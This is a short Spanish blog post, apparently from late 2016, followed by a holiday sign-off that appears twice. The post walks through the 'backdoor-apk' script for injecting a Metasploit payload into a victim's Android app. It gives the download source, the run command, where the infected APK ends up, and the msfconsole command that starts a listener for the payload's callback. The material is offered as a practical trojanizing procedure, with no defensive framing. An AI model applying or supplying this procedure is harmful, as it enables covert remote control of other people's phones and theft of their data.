Hola amigos:
Hace unos posts, hablábamos de cómo
inyectar un payload de android en una app, y lo hacíamos a mano.
En esta ocasión, vamos a presentar un
script que nos lo automatizará. Este script se llama backdoor-apk y
lo descargamos de https://github.com/dana-at-cp/backdoor-apk
Lo descomprimimos
unzip backdoor-apk-master.zip
Nos vamos al directorio
/backdoor-apk-master/backdoor-apk
Copiamos la app víctima dentro de este
mismo directorio.
Y Ejecutamos:
./backdoor-apk.sh <app_victima>
Ojo, es importante poner en el mismo
directorio de backdoor-apk.sh la app objetivo, pues si no, nos dará
un error.
Y completamos lo que nos piden (tipo de
payload, IP local y puerto de destino).
La app infectada la podremos encontrar
en el subdirectorio /original/dist/
Podemos iniciar metasploit preparadito
para escuchar el payload con
msfconsole -r backdoor-apk.rc
Para borrar los archivos generados y
poder volver a usar el script:
./cleanup.sh.
Y ahora toca disfrutar las vacaciones de Navidad. El próximo post será el 13 de Enero del 2017 (al menos, lo intentaré). Sin embargo, estamos en contacto en las redes sociales:
Que paséis una Feliz Navidad, un feliz 2017 y un expléndido Día de Reyes.
Felices fiestas y ¡¡¡ Happy Hacking !!!
Y ahora toca disfrutar las vacaciones de Navidad. El próximo post será el 13 de Enero del 2017 (al menos, lo intentaré). Sin embargo, estamos en contacto en las redes sociales:
- Facebook: facebook.com/Manugomez1977
- Twitter: @manugomez1977
- Instagram: @MANUGOMEZ1977
Que paséis una Feliz Navidad, un feliz 2017 y un expléndido Día de Reyes.
Felices fiestas y ¡¡¡ Happy Hacking !!!
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.